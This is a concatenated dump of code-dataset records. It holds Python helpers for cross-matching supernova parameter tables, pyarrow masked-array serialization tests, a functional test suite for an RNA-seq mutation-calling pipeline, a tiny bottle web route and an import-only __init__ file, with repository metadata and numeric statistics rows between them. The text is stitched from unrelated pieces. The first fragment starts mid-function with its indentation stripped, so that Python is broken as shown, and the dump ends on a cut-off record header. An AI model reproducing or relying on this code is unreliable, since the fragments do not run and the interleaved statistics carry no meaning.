From two files create arrays of the parameter values for SN present in both
"""
a1=np.loadtxt(fil1, dtype='string', delimiter='&')
a2=np.loadtxt(fil2, dtype='string', delimiter='&')
dm=np.loadtxt('/home/sdhawan/workspaces/nir_ref_report/files/dist_tab.tex', dtype='string', delimiter='&')
#print dm[:,0], a2[:,0]
#nm=np.array([i[0][:-1] for i in a2])
arr1=[]; arr2=[]
for i in a1:
if i[0] in a2[:,0]:
try:
if 'SN'+i[0][:-1]+'\t' in dm[:,0]:
arr1.append([i[n][2:6], dm[dm[:,0]=='SN'+i[0][:-1]+'\t'][0][5][1:-1]])
arr2.append([a2[a2[:,0]==i[0]][0][n1][2:6], dm[dm[:,0]=='SN'+i[0][:-1]+'\t'][0][5][1:-1]])
elif 'SN'+i[0][:-2]+'\t\t' in dm[:,0]:
arr1.append([i[n][2:6], dm[dm[:,0]=='SN'+i[0][:-2]+'\t\t'][0][5][1:-1]])
arr2.append([a2[a2[:,0]==i[0]][0][n1][2:6], dm[dm[:,0]=='SN'+i[0][:-2]+'\t\t'][0][5][1:-1]])
except:
i[0]
#arr1=[i[n][2:6] for i in a1 if i[0] in a2[:,0] ]
#arr1=[[i[n][2:6], dm[dm[:,0]=='SN'+i[0][:-1]+'\t'][0][5][1:-1]] for i in a1 if i[0] in a2[:,0] and 'SN'+i[0][:-1]+'\t' in dm[:,0]]
#arr2=[[a2[a2[:,0]==i[0]][0][n1][2:6], dm[dm[:,0]=='SN'+i[0][:-1]+'\t'][0][5][1:-1]] for i in a1 if i[0] in a2[:,0] and 'SN'+i[0][:-1]+'\t' in dm[:,0]]
f1=[]; f2=[]
for k in range(len(arr1)):
try:
finp=float(arr1[k][0])-float(arr1[k][1])
finp2=float(arr2[k][0])-float(arr2[k][1])
f1.append(finp)
f2.append(finp2)
except:
arr1[k]
return np.array(f1), np.array(f2)
def mix_arr_crt(fil1, fil2, n, n1):
"""
From two files create arrays of the parameter values for SN present in both
"""
a1=np.loadtxt(fil1, dtype='string', delimiter='&')
a2=np.loadtxt(fil2, dtype='string', delimiter='&')
dm=np.loadtxt('/home/sdhawan/workspaces/nir_ref_report/files/dist_tab.tex', dtype='string', delimiter='&')
#print dm[:,0]
#nm=np.array([i[0][:-1] for i in a2])
if n % 2 == 1:
arr1=[]; arr2=[]
for i in a1:
if i[0] in a2[:,0]:
try:
if 'SN'+i[0][:-1]+'\t' in dm[:,0]:
arr1.append([i[n][2:7], dm[dm[:,0]=='SN'+i[0][:-1]+'\t'][0][5][1:-1]])
elif 'SN'+i[0][:-2]+'\t\t' in dm[:,0]:
arr1.append([i[n][2:7], dm[dm[:,0]=='SN'+i[0][:-2]+'\t\t'][0][5][1:-1]])
arr2.append(a2[a2[:,0]==i[0]][0][n1][2:6])
except:
i[0]
#arr1=[[i[n][2:6], dm[dm[:,0]=='SN'+i[0][:-1]+'\t'][0][5][1:-1]] for i in a1 if i[0] in a2[:,0] and 'SN'+i[0][:-1]+'\t' in dm[:,0]]
#arr2=[a2[a2[:,0]==i[0]][0][n1][2:6] for i in a1 if i[0] in a2[:,0] and 'SN'+i[0][:-1]+'\t' in dm[:,0]]
elif n % 2 == 0:
arr1=[]; arr2=[]
for i in a1:
if i[0] in a2[:,0]:
try:
if 'SN'+i[0][:-1]+'\t' in dm[:,0]:
arr2.append([i[n][2:7], dm[dm[:,0]=='SN'+i[0][:-1]+'\t'][0][5][1:-1]])
elif 'SN'+i[0][:-2]+'\t\t' in dm[:,0]:
arr2.append([i[n][2:7], dm[dm[:,0]=='SN'+i[0][:-2]+'\t\t'][0][5][1:-1]])
arr1.append(a2[a2[:,0]==i[0]][0][n1][2:6])
except:
i[0]
#arr2=[[i[n][2:6], dm[dm[:,0]=='SN'+i[0][:-1]+'\t'][0][5][1:-1]] for i in a1 if i[0] in a2[:,0] and 'SN'+i[0][:-1]+'\t' in dm[:,0]]
#arr1=[a2[a2[:,0]==i[0]][0][n1][2:6] for i in a1 if i[0] in a2[:,0] and 'SN'+i[0][:-1]+'\t' in dm[:,0]]
f1=[]; f2=[]
for k in range(len(arr1)):
try:
if n % 2 == 1:
finp=float(arr1[k][0])-float(arr1[k][1])
finp2=float(arr2[k])
elif n % 2 == 0:
finp=float(arr1[k])
finp2=float(arr2[k][0])-float(arr2[k][1])
f1.append(finp)
f2.append(finp2)
except:
arr1[k]
return np.array(f1), np.array(f2)
def dm1_arr_crt(fil1, n):
"""
From two files create arrays of the parameter values for SN present in both
"""
a1=np.loadtxt(fil1, dtype='string', delimiter='&')
#a2=np.loadtxt(fil2, dtype='string', delimiter='&')
dm=np.loadtxt('/home/sdhawan/workspaces/nir_ref_report/files/dist_tab.tex', dtype='string', delimiter='&')
arr1=[]; arr2=[]
for i in a1:
try:
if 'SN'+i[0][:-1]+'\t' in dm[:,0]:
arr2.append([float(i[n][2:7]), float(dm[dm[:,0]=='SN'+i[0][:-1]+'\t'][0][3][1:-1])])
elif 'SN'+i[0][:-2]+'\t\t' in dm[:,0]:
arr2.append([float(i[n][2:7]), float(dm[dm[:,0]=='SN'+i[0][:-2]+'\t\t'][0][3][1:-1])])
#arr1.append(a2[a2[:,0]==i[0]][0][n1][2:6])
except:
i[0]
#print dm[:,0]
#nm=np.array([i[0][:-1] for i in a2])
arr2=np.array(arr2)
return arr2[:,0].astype('float32'), arr2[:,1].astype('float32')
def tl_arr_crt(n, par):
a1=np.loadtxt('../files/lira_tab.tex', dtype='string', delimiter='&')
arr2=[]
print par
if par[0] == 't':
ff=np.loadtxt('../files/mod_tabJ-exp.tex', dtype='string', delimiter='&')
for i in a1:
try:
if i[0][:-1]+' ' in ff[:,0]:
print ff[ff[:,0]==i[0][:-1]+' '][0][n][2:6]
arr2.append([float(i[3][1:]), float(ff[ff[:,0]==i[0][:-1]+' '][0][n][2:6])])
elif i[0][:-2]+' ' in ff[:,0]:
print ff[ff[:,0]==i[0][:-2]+' '][0][n][1:-1]
arr2.append([float(i[3][1:]), float(ff[ff[:,0]==i[0][:-2]+' '][0][n][2:6])])
except Exception:
pass
elif par == 'Dm15':
dm=np.loadtxt('/home/sdhawan/workspaces/nir_ref_report/files/dist_tab.tex', dtype='string', delimiter='&')
#arr2=[]
for i in a1:
try:
#print i[0], dm[0][0]
if 'SN'+i[0][:-1]+'\t' in dm[:,0]:
arr2.append([float(i[3]), float(dm[dm[:,0]=='SN'+i[0][:-1]+'\t'][0][3][1:-1])])
elif 'SN'+i[0][:-2]+'\t\t' in dm[:,0]:
arr2.append([float(i[3]), float(dm[dm[:,0]=='SN'+i[0][:-2]+'\t\t'][0][3][1:-1])])
#arr1.append(a2[a2[:,0]==i[0]][0][n1][2:6])
except Exception:
pass
else:
arr2=np.ones([10, 2])
arr2=np.array(arr2)
return arr2[:,0], arr2[:,1]
def inv_tl_arr_crt(n, par):
a1=np.loadtxt('../files/lira_tab.tex', dtype='string', delimiter='&')
arr2=[]
print par
if par[0] == 't':
ff=np.loadtxt('../files/mod_tabJ-exp.tex', dtype='string', delimiter='&')
for i in a1:
try:
if i[0][:-1]+' ' in ff[:,0]:
arr2.append([float(i[3][1:]), float(ff[ff[:,0]==i[0][:-1]+' '][0][n][2:6])])
elif i[0][:-2]+' ' in ff[:,0]:
print ff[ff[:,0]==i[0][:-2]+' '][0][n][1:-1]
arr2.append([float(i[3][1:]), float(ff[ff[:,0]==i[0][:-2]+' '][0][n][2:6])])
except Exception:
pass
elif par == 'Dm15':
dm=np.loadtxt('/home/sdhawan/workspaces/nir_ref_report/files/dist_tab.tex', dtype='string', delimiter='&')
#arr2=[]
for i in a1:
try:
#print i[0], dm[0][0]
if 'SN'+i[0][:-1]+'\t' in dm[:,0]:
arr2.append([float(i[3]), float(dm[dm[:,0]=='SN'+i[0][:-1]+'\t'][0][3][1:-1])])
elif 'SN'+i[0][:-2]+'\t\t' in dm[:,0]:
arr2.append([float(i[3]), float(dm[dm[:,0]=='SN'+i[0][:-2]+'\t\t'][0][3][1:-1])])
#arr1.append(a2[a2[:,0]==i[0]][0][n1][2:6])
except Exception:
pass
else:
arr2=np.ones([10, 2])  # fall back to dummy values for an unrecognised par, mirroring tl_arr_crt
arr2=np.array(arr2)
return arr2[:,1], arr2[:,0]
| 23.562353 | 154 | 0.518574 | 2,009 | 10,014 | 2.561971 | 0.087606 | 0.035749 | 0.030309 | 0.025257 | 0.782009 | 0.779289 | 0.763552 | 0.749174 | 0.741986 | 0.73538 | 0 | 0.098602 | 0.18574 | 10,014 | 424 | 155 | 23.617925 | 0.532622 | 0.121929 | 0 | 0.619658 | 0 | 0 | 0.088846 | 0.048693 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.008547 | null | null | 0.021368 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
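# The SN-matching helpers above rebuild strings like 'SN'+name[:-1]+'\t' and rescan the
# distance table inside nested loops. The sketch below shows the same cross-match done once
# through a dictionary keyed on normalised names. It is an illustration only: the column
# indices and the name-normalisation rule are assumptions, not the actual table layout.
import numpy as np

def _normalise(name):
    s = name.strip()
    return s[2:] if s.startswith('SN') else s  # assumed naming rule: optional 'SN' prefix

def cross_match(par_rows, dist_rows, par_col=3, dist_col=5):
    """Pair a parameter column with a distance-table column for SNe present in both tables."""
    dist_lookup = {_normalise(row[0]): row[dist_col] for row in dist_rows}  # build the lookup once
    pairs = []
    for row in par_rows:
        key = _normalise(row[0])
        if key not in dist_lookup:
            continue
        try:
            pairs.append((float(row[par_col]), float(dist_lookup[key])))
        except ValueError:
            continue  # skip malformed numeric fields
    return np.array(pairs)

# usage: arr = cross_match(a1, dm); param, second_col = arr[:, 0], arr[:, 1]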
dbcdfb3cbffcd1ed9aff848124c9ca5c31b617cf | 1,522 | py | Python | descarteslabs/common/workflows/arrow_serialization/tests/test_context.py | carderne/descarteslabs-python | 757b480efb8d58474a3bf07f1dbd90652b46ed64 | [
"Apache-2.0"
] | 167 | 2017-03-23T22:16:58.000Z | 2022-03-08T09:19:30.000Z | descarteslabs/common/workflows/arrow_serialization/tests/test_context.py | carderne/descarteslabs-python | 757b480efb8d58474a3bf07f1dbd90652b46ed64 | [
"Apache-2.0"
] | 93 | 2017-03-23T22:11:40.000Z | 2021-12-13T18:38:53.000Z | descarteslabs/common/workflows/arrow_serialization/tests/test_context.py | carderne/descarteslabs-python | 757b480efb8d58474a3bf07f1dbd90652b46ed64 | [
"Apache-2.0"
] | 46 | 2017-03-25T19:12:14.000Z | 2021-08-15T18:04:29.000Z | import numpy as np
import pyarrow as pa
from ..context import serialization_context
def test_numpy_masked_array_serialization():
arr = np.array([1, 2, 3, 4])
arr_mask = np.array([True, False, True, False])
masked_arr = np.ma.masked_array(arr, arr_mask)
serialized_masked_arr = pa.serialize(masked_arr, context=serialization_context)
deserialized_masked_arr = pa.deserialize(
serialized_masked_arr.to_buffer(), context=serialization_context
)
np.testing.assert_array_equal(deserialized_masked_arr, masked_arr)
def test_numpy_masked_array_serialization_nomask():
arr = np.array([1, 2, 3, 4])
arr_mask = np.ma.nomask
masked_arr = np.ma.masked_array(arr, arr_mask)
serialized_masked_arr = pa.serialize(masked_arr, context=serialization_context)
deserialized_masked_arr = pa.deserialize(
serialized_masked_arr.to_buffer(), context=serialization_context
)
np.testing.assert_array_equal(deserialized_masked_arr, masked_arr)
def test_numpy_masked_constant_serialization():
constant = np.ma.masked
serialized = pa.serialize(constant, context=serialization_context)
deserialized = pa.deserialize(serialized.to_buffer(), context=serialization_context)
assert deserialized is np.ma.masked
def test_python_slice_serialization():
s = slice(1, 2, 3)
serialized = pa.serialize(s, context=serialization_context)
deserialized = pa.deserialize(serialized.to_buffer(), context=serialization_context)
assert deserialized == s
| 33.822222 | 88 | 0.763469 | 198 | 1,522 | 5.560606 | 0.186869 | 0.114441 | 0.196185 | 0.141689 | 0.773842 | 0.773842 | 0.724796 | 0.724796 | 0.724796 | 0.724796 | 0 | 0.008462 | 0.145861 | 1,522 | 44 | 89 | 34.590909 | 0.838462 | 0 | 0 | 0.451613 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.129032 | 1 | 0.129032 | false | 0 | 0.096774 | 0 | 0.225806 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
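# The tests above all round-trip objects through a shared `serialization_context`. The sketch
# below shows how such a context is typically assembled with the legacy pyarrow
# SerializationContext API (deprecated in later pyarrow releases and eventually removed).
# The masked-array handler here is a hypothetical illustration, not the descarteslabs code.
import numpy as np
import pyarrow as pa

context = pa.SerializationContext()

def _serialize_masked_array(arr):
    # store data and mask separately; np.ma.getmaskarray also covers the nomask case
    return {"data": np.asarray(arr.data), "mask": np.ma.getmaskarray(arr)}

def _deserialize_masked_array(payload):
    return np.ma.masked_array(payload["data"], payload["mask"])

context.register_type(
    np.ma.MaskedArray,
    "numpy.ma.MaskedArray",
    custom_serializer=_serialize_masked_array,
    custom_deserializer=_deserialize_masked_array,
)
# the masked constant (np.ma.masked) and slice objects exercised by the tests would need
# their own register_type calls in the same way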
916b91f2bd98059ebb1ddf4b1b542ffe4e5a9db4 | 18,036 | py | Python | src/FunctionalTester.py | brownmp/ctat-mutations | e69965455b0ee4c6d0fbabcc345293ca30772a2c | [
"BSD-3-Clause"
] | 59 | 2018-05-02T15:04:26.000Z | 2022-03-30T20:26:47.000Z | src/FunctionalTester.py | brownmp/ctat-mutations | e69965455b0ee4c6d0fbabcc345293ca30772a2c | [
"BSD-3-Clause"
] | 51 | 2018-05-07T17:45:28.000Z | 2022-03-29T17:13:42.000Z | src/FunctionalTester.py | brownmp/ctat-mutations | e69965455b0ee4c6d0fbabcc345293ca30772a2c | [
"BSD-3-Clause"
] | 18 | 2018-05-07T17:40:23.000Z | 2021-12-14T04:18:24.000Z |
__author__ = "Timothy Tickle"
__copyright__ = "Copyright 2015"
__credits__ = ["Timothy Tickle", "Brian Haas"]
__license__ = "MIT"
__maintainer__ = "Timothy Tickle"
__email__ = "ttickle@broadinstitute.org"
__status__ = "Development"
import Commandline
import os
import ParentPipelineTester
import unittest
class FunctionalTester(ParentPipelineTester.ParentPipelineTester):
"""
Functional testing for scripts, these are focused on making sure the script can be called in different ways and complete without error.
"""
# Testing environment
str_script_dir = "/ahg/regev/users/ttickle/dev/Trinity_CTAT/mutation/src"
str_test_data = "/seq/RNASEQ/public_ftp/CTAT/mutation/demo_data"
str_testing_area = "/broad/hptmp/ttickle/active_testing_script_tester"
os.environ['PATH'] = ":".join([str_script_dir,os.getenv('PATH',None)])
str_input_index = os.path.join(str_test_data, "Hg19_11")
str_input_test_bam = os.path.join(str_test_data, "Aligned.sortedByCoord.out.bam")
str_left_file = os.path.join(str_test_data, "FLI1.left.fq")
str_right_file = os.path.join(str_test_data, "FLI1.right.fq")
str_reference_vcf = os.path.join(str_test_data, "dbsnp_FLI1.vcf")
str_reference_genome = os.path.join(str_test_data, "Hg19_11.fa")
str_update_command = "".join(["--update AddOrReplaceReadGroups.jar",
":/seq/regev_genome_portal/SOFTWARE/Picard/current,",
"MarkDuplicates.jar",
":/seq/regev_genome_portal/SOFTWARE/Picard/current,",
"SortSam.jar",
":/seq/regev_genome_portal/SOFTWARE/Picard/current,",
"snpEff.jar",
":/seq/regev_genome_portal/SOFTWARE/snpEff,",
"GenomeAnalysisTK.jar",
":/humgen/gsa-hpprojects/GATK/bin/GenomeAnalysisTK-3.1-1-g07a4bf8"])
def test_rnaseq_mutation_pipeline_for_no_args(self):
"""
Tests rnaseq_mutation_pipeline.py for no args call.
"""
# Create test environment
str_command = "python rnaseq_mutation_pipeline.py"
# Run command
f_success = Commandline.Commandline().func_CMD(str_command)
# Test error
self.assertFalse(f_success, str_command)
def test_rnaseq_mutation_pipeline_for_args_short(self):
"""
Tests rnaseq_mutation_pipeline.py for the short help argument (-h).
"""
# Create test environment
str_command = "python rnaseq_mutation_pipeline.py -h"
# Run command
f_success = Commandline.Commandline().func_CMD(str_command)
# Test error
self.assertTrue(f_success, str_command)
def test_rnaseq_mutation_pipeline_for_args_long(self):
"""
Tests rnaseq_mutation_pipeline.py for the long help argument (--help).
"""
# Create test environment
str_command = "python rnaseq_mutation_pipeline.py --help"
# Run command
f_success = Commandline.Commandline().func_CMD(str_command)
# Test error
self.assertTrue(f_success, str_command)
def test_rnaseq_mutation_pipeline_for_test(self):
"""
Tests rnaseq_mutation_pipeline.py for test mode.
"""
# Create test environment
str_command = " ".join(["python rnaseq_mutation_pipeline.py",
"--alignment_mode STAR",
"--variant_call_mode GATK",
"--threads 8",
"--plot",
"--reference", self.str_reference_genome,
"--left", self.str_left_file,
"--right", self.str_right_file,
"--test",
"--out_dir", "_".join([self.str_testing_area,"vanilla_test"]),
"--vcf",self.str_reference_vcf,
self.str_update_command])
# Run command
f_success = Commandline.Commandline().func_CMD(str_command)
# Test error
self.assertTrue(f_success, str_command)
def test_rnaseq_mutation_pipeline_for_gatk_call(self):
"""
Tests rnaseq_mutation_pipeline.py for gatk call.
"""
str_output_dir = os.path.join(self.str_testing_area,"vanilla_gatk")
self.func_make_dummy_dirs([self.str_testing_area, str_output_dir])
# Create test environment
str_command = " ".join(["python rnaseq_mutation_pipeline.py",
"--alignment_mode STAR",
"--variant_call_mode GATK",
"--threads 8",
"--plot",
"--reference", self.str_reference_genome,
"--left", self.str_left_file,
"--right", self.str_right_file,
"--variant_filtering_mode GATK",
"--out_dir",
str_output_dir,
"--vcf", self.str_reference_vcf,
self.str_update_command])
# Run command
f_success = Commandline.Commandline().func_CMD(str_command)
# Test error
self.assertTrue(f_success, str_command)
def test_rnaseq_mutation_pipeline_for_compression(self):
"""
Tests rnaseq_mutation_pipeline.py for compression.
"""
# Create test environment
str_command = " ".join(["python rnaseq_mutation_pipeline.py",
"--alignment_mode STAR",
"--variant_call_mode GATK",
"--threads 8",
"--plot",
"--reference", self.str_reference_genome,
"--left", self.str_left_file,
"--right",self.str_right_file,
"--out_dir", "_".join([self.str_testing_area,"vanilla_compression"]),
"--vcf", self.str_reference_vcf,
self.str_update_command,
"--compress","archive"])
# Run command
f_success = Commandline.Commandline().func_CMD(str_command)
# Test error
self.assertTrue(f_success, str_command)
def test_rnaseq_mutation_pipeline_for_clean(self):
"""
Tests rnaseq_mutation_pipeline.py for clean.
"""
# Create test environment
str_command = " ".join(["python rnaseq_mutation_pipeline.py",
"--alignment_mode STAR",
"--variant_call_mode GATK",
"--threads 8",
"--plot",
"--reference", self.str_reference_genome,
"--left", self.str_left_file,
"--right", self.str_right_file,
"--out_dir", "_".join([self.str_testing_area,"vanilla_clean"]),
"--vcf", self.str_reference_vcf,
self.str_update_command,
"--clean"])
# Run command
f_success = Commandline.Commandline().func_CMD(str_command)
# Test error
self.assertTrue(f_success, str_command)
def test_rnaseq_mutation_pipeline_for_archive(self):
"""
Tests rnaseq_mutation_pipeline.py for archive.
"""
# Create test environment
str_copy_dir = os.path.join(self.str_testing_area, "copy_test_runs")
str_command = " ".join(["python rnaseq_mutation_pipeline.py",
"--alignment_mode STAR",
"--variant_call_mode GATK",
"--threads 8",
"--plot",
"--reference", self.str_reference_genome,
"--left", self.str_left_file,
"--right", self.str_right_file,
"--out_dir", "_".join([self.str_testing_area,"vanilla_archive"]),
"--vcf",self.str_reference_vcf, self.str_update_command,
"--copy", str_copy_dir])
# Run command
if not os.path.exists(str_copy_dir):
os.mkdir(str_copy_dir)
f_success = Commandline.Commandline().func_CMD(str_command)
# Test error
self.assertTrue(f_success, str_command)
def test_rnaseq_mutation_pipeline_for_realign(self):
"""
Tests rnaseq_mutation_pipeline.py for realignment.
"""
# Create test environment
str_command = " ".join(["python rnaseq_mutation_pipeline.py",
"--alignment_mode STAR",
"--variant_call_mode GATK",
"--threads 8",
"--plot",
"--reference", self.str_reference_genome,
"--left", self.str_left_file,
"--right", self.str_right_file,
"--out_dir", "_".join([self.str_testing_area,"vanilla_realign"]),
"--vcf", self.str_reference_vcf,
self.str_update_command,
"--realign"])
# Run command
f_success = Commandline.Commandline().func_CMD(str_command)
# Test error
self.assertTrue(f_success, str_command)
def test_rnaseq_mutation_pipeline_for_starting_with_bam(self):
"""
Tests rnaseq_mutation_pipeline.py for starting with a bam.
"""
# Create test environment
str_command = " ".join(["python rnaseq_mutation_pipeline.py",
"--alignment_mode STAR",
"--variant_call_mode GATK",
"--threads 8",
"--plot",
"--reference", self.str_reference_genome,
"--left", self.str_left_file,
"--right",self.str_right_file,
"--out_dir", "_".join([self.str_testing_area,"vanilla_bam"]),
"--vcf", self.str_reference_vcf,
self.str_update_command,
"--bam", self.str_input_test_bam])
# Run command
f_success = Commandline.Commandline().func_CMD(str_command)
# Test error
self.assertTrue(f_success, str_command)
def test_rnaseq_mutation_pipeline_for_star_limited(self):
"""
Tests rnaseq_mutation_pipeline.py for starting with start limited mode
"""
# Create test environment
str_command = " ".join(["python rnaseq_mutation_pipeline.py",
"--alignment_mode LIMITED",
"--variant_call_mode GATK",
"--threads 8",
"--plot",
"--reference", self.str_reference_genome,
"--left", self.str_left_file,
"--right", self.str_right_file,
"--out_dir", "_".join([self.str_testing_area,"vanilla_limited"]),
"--vcf", self.str_reference_vcf,
self.str_update_command])
# Run command
f_success = Commandline.Commandline().func_CMD(str_command)
# Test error
self.assertTrue(f_success, str_command)
def test_rnaseq_mutation_pipeline_for_named_log_file(self):
"""
Tests rnaseq_mutation_pipeline.py for starting with a named log file.
"""
# Create test environment
str_command = " ".join(["python rnaseq_mutation_pipeline.py",
"--alignment_mode STAR",
"--variant_call_mode GATK",
"--threads 8",
"--plot",
"--reference", self.str_reference_genome,
"--left", self.str_left_file,
"--right", self.str_right_file,
"--out_dir", "_".join([self.str_testing_area,"vanilla_samtools"]),
"--vcf", self.str_reference_vcf,
self.str_update_command,
"--log", os.path.join("_".join([self.str_testing_area,"vanilla_log"]),"run.log")])
# Run command
f_success = Commandline.Commandline().func_CMD(str_command)
# Test error
self.assertTrue(f_success, str_command)
def test_rnaseq_mutation_pipeline_for_starting_with_premade_index(self):
"""
Tests rnaseq_mutation_pipeline.py for starting with a premade index
"""
# Create test environment
str_command = " ".join(["python rnaseq_mutation_pipeline.py",
"--alignment_mode STAR",
"--variant_call_mode GATK",
"--threads 8",
"--plot",
"--reference", self.str_reference_genome,
"--left", self.str_left_file,
"--right", self.str_right_file,
"--out_dir", "_".join([self.str_testing_area,"vanilla_premade_index"]),
"--vcf", self.str_reference_vcf,
self.str_update_command,
"--index", self.str_input_index])
# Run command
f_success = Commandline.Commandline().func_CMD(str_command)
# Test error
self.assertTrue(f_success, str_command)
def test_rnaseq_mutation_pipeline_for_no_recalibration(self):
"""
Tests rnaseq_mutation_pipeline.py for no recalibration
"""
# Create test environment
str_command = " ".join(["python rnaseq_mutation_pipeline.py",
"--alignment_mode STAR",
"--variant_call_mode GATK",
"--threads 8",
"--plot",
"--reference", self.str_reference_genome,
"--left", self.str_left_file,
"--right", self.str_right_file,
"--out_dir", "_".join([self.str_testing_area,"vanilla_no_recal"]),
"--vcf", self.str_reference_vcf,
self.str_update_command,
"--recalibrate_sam"])
# Run command
f_success = Commandline.Commandline().func_CMD(str_command)
# Test error
self.assertTrue(f_success, str_command)
def test_rnaseq_mutation_pipeline_for_move(self):
"""
Tests rnaseq_mutation_pipeline.py for moving files
"""
# Create test environment
str_move_dir = os.path.join(self.str_testing_area, "move_test_runs")
str_command = " ".join(["python rnaseq_mutation_pipeline.py",
"--alignment_mode STAR",
"--variant_call_mode GATK",
"--threads 8",
"--plot",
"--reference", self.str_reference_genome,
"--left", self.str_left_file,
"--right", self.str_right_file,
"--out_dir", "_".join([self.str_testing_area,"vanilla_no_move"]),
"--vcf", self.str_reference_vcf,
self.str_update_command,
"--move", str_move_dir])
# Run command
if not os.path.exists(str_move_dir):
os.mkdir(str_move_dir)
f_success = Commandline.Commandline().func_CMD(str_command)
# Test error
self.assertTrue(f_success, str_command)
def test_rnaseq_mutation_pipeline_for_no_filtering(self):
"""
Tests rnaseq_mutation_pipeline.py for a run with no filtering.
"""
# Create test environment
str_command = " ".join(["python rnaseq_mutation_pipeline.py",
"--alignment_mode STAR",
"--variant_call_mode GATK",
"--threads 8",
"--plot",
"--reference", self.str_reference_genome,
"--left", self.str_left_file,
"--right", self.str_right_file,
"--variant_filtering_mode NONE",
"--out_dir", "_".join([self.str_testing_area,"vanilla_samtools"]),
"--vcf", self.str_reference_vcf,
self.str_update_command])
# Run command
f_success = Commandline.Commandline().func_CMD(str_command)
# Test error
self.assertTrue(f_success, str_command)
# Creates a suite of tests
def suite():
return unittest.TestLoader().loadTestsFromTestCase(FunctionalTester)
| 48.353887 | 139 | 0.505877 | 1,669 | 18,036 | 5.095866 | 0.107849 | 0.069136 | 0.124162 | 0.0903 | 0.805409 | 0.805409 | 0.792593 | 0.754733 | 0.702058 | 0.649148 | 0 | 0.003207 | 0.394821 | 18,036 | 372 | 140 | 48.483871 | 0.775996 | 0.101686 | 0 | 0.657258 | 0 | 0 | 0.188166 | 0.062595 | 0 | 0 | 0 | 0 | 0.064516 | 1 | 0.068548 | false | 0 | 0.016129 | 0.004032 | 0.133065 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
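# Each test above builds a long command string and delegates to the project's
# Commandline.func_CMD wrapper, asserting only on the boolean result. A minimal stand-in
# for such a wrapper using just the standard library is sketched below; the assumed
# behaviour (True on exit code 0, output captured) may differ from the real Commandline module.
import shlex
import subprocess

def run_command(cmd, timeout=None):
    """Run a command string and report whether it exited with status 0."""
    try:
        result = subprocess.run(shlex.split(cmd), capture_output=True, timeout=timeout)
    except (OSError, subprocess.TimeoutExpired):
        return False
    return result.returncode == 0

# usage inside a test: self.assertTrue(run_command("python rnaseq_mutation_pipeline.py --help"))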
918d4f88f8103336b675ac0309ca7e38d523f323 | 86 | py | Python | app/home.py | ChrisDesigns/ADV-Database | 2aed0d4b88a881601a213bf157f3f4f3d537ce39 | [
"MIT"
] | null | null | null | app/home.py | ChrisDesigns/ADV-Database | 2aed0d4b88a881601a213bf157f3f4f3d537ce39 | [
"MIT"
] | null | null | null | app/home.py | ChrisDesigns/ADV-Database | 2aed0d4b88a881601a213bf157f3f4f3d537ce39 | [
"MIT"
] | null | null | null | from bottle import get, template
@get('/')
def index():
return template("index")
| 14.333333 | 32 | 0.662791 | 11 | 86 | 5.181818 | 0.727273 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.174419 | 86 | 5 | 33 | 17.2 | 0.802817 | 0 | 0 | 0 | 0 | 0 | 0.069767 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | true | 0 | 0.25 | 0.25 | 0.75 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
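# The route above only renders a template named "index". A hedged sketch of serving such an
# app with bottle's built-in development server follows; host, port and debug flag are
# illustrative values, and a proper WSGI server would replace run() in production.
from bottle import get, run, template

@get('/')
def index():
    return template("index")

if __name__ == '__main__':
    run(host='127.0.0.1', port=8080, debug=True)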
37e6924d8fd2d8d6ad34093d98ec71bbad4fd1ac | 67 | py | Python | tensor_rnn/modules/composite/__init__.py | arkmagus/tensor_rnn | aa74a2414d6e46cc8ddf9be81f38eb262348194b | [
"MIT"
] | 18 | 2018-03-30T12:39:11.000Z | 2021-07-16T05:10:42.000Z | tensor_rnn/modules/composite/__init__.py | androstj/tensor_rnn | aa74a2414d6e46cc8ddf9be81f38eb262348194b | [
"MIT"
] | null | null | null | tensor_rnn/modules/composite/__init__.py | androstj/tensor_rnn | aa74a2414d6e46cc8ddf9be81f38eb262348194b | [
"MIT"
] | 5 | 2018-09-28T08:51:54.000Z | 2021-04-08T08:05:44.000Z | from .cprnn import *
from .tuckerrnn import *
from .ttrnn import *
| 16.75 | 24 | 0.731343 | 9 | 67 | 5.444444 | 0.555556 | 0.408163 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.179104 | 67 | 3 | 25 | 22.333333 | 0.890909 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
5328ab30925df40744601061cd773028f759191e | 26,837 | py | Python | cadishi/tests/test_pydh_cudh.py | bio-phys/cadishi | b44351fcb77737c6a6da5249a0c24ee8e34f72d2 | [
"MIT"
